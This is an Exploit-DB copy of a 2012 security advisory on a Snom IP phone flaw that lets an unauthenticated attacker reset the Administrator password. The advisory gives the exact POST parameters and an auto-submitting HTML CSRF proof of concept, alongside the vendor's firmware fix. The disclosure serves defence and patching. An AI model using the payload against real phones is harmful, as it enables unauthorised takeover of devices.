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vendor:
IP Phone series
by:
Sense of Security
7,5
CVSS
HIGH
Privilege escalation
N/A
CWE
Product Name: IP Phone series
Affected Version From: All versions prior to v8.4.35
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE - not yet assigned
CPE: N/A
Other Scripts: N/A
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CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Hardware
2012

Sense of Security – Security Advisory – SOS-12-001

The privilege escalation is possible because the form used to login as the admin user is the same form for resetting the admin password, and the user is not required to enter their old password when changing their password. This form is also vulnerable to Cross-Site Request Forgery (CSRF). This issue is exploitable on the following pages: Version 7, 8: http://x.x.x.x/advanced_network.htm Version 6 and below: http://x.x.x.x/advanced.htm Where an attacker can reset the Administrator password by removing all password attempt variables and adding the following POST data: admin_mode=on admin_mode_password=newpass admin_mode_password_confirm=newpass Settings=Save hidden_tag=(leave as the current post variable if CSRF protection is enabled in firmware versions 7.1.33 and above)

Mitigation:

Download the latest firmware version 8.4.35 for the Snom phone from: http://wiki.snom.com/Firmware/V8
Source

Exploit-DB raw data:

Sense of Security - Security Advisory - SOS-12-001

Release Date.              23-Feb-2012
Last Update.               -              
Vendor Notification Date.  27-Jan-2012
Product.                   Snom IP Phone series
Platform.                  Hardware
Affected versions.         All versions prior to v8.4.35
Severity Rating.           High 
Impact.                    Privilege escalation
Attack Vector.             Remote without authentication
Solution Status.           Vendor patch
CVE reference.             CVE - not yet assigned

Details.
The privilege escalation is possible because the form used to
login as the admin user is the same form for resetting the
admin password, and the user is not required to enter their
old password when changing their password. This form is also
vulnerable to Cross-Site Request Forgery (CSRF).

This issue is exploitable on the following pages:
Version 7, 8: http://x.x.x.x/advanced_network.htm
Version 6 and below: http://x.x.x.x/advanced.htm

Where an attacker can reset the Administrator password by
removing all password attempt variables and adding the
following POST data:

admin_mode=on
admin_mode_password=newpass
admin_mode_password_confirm=newpass
Settings=Save
hidden_tag=(leave as the current post variable if CSRF
protection is enabled in firmware versions 7.1.33 and above)

After sending the request the attacker can now login as the
Administrator with the credentials specified in the above
request. 

Proof of Concept.
<?php echo htmlentities('<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action=" http://x.x.x.x/advanced_network.htm" name="form"
method="POST">
<input type="text" name="admin_mode" value="on">
<input type="text" name="admin_mode_password" value="newpass">
<input type="text" name="admin_mode_password_confirm" value="newpass">
<input type="text" name="Settings" value="save">
</form>
</body><br>
</html>'); ?>

Solution.
Download the latest firmware version 8.4.35 for the Snom phone from:
http://wiki.snom.com/Firmware

Discovered by.
Nathaniel Carew from Sense of Security Labs.

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The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-12-001.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php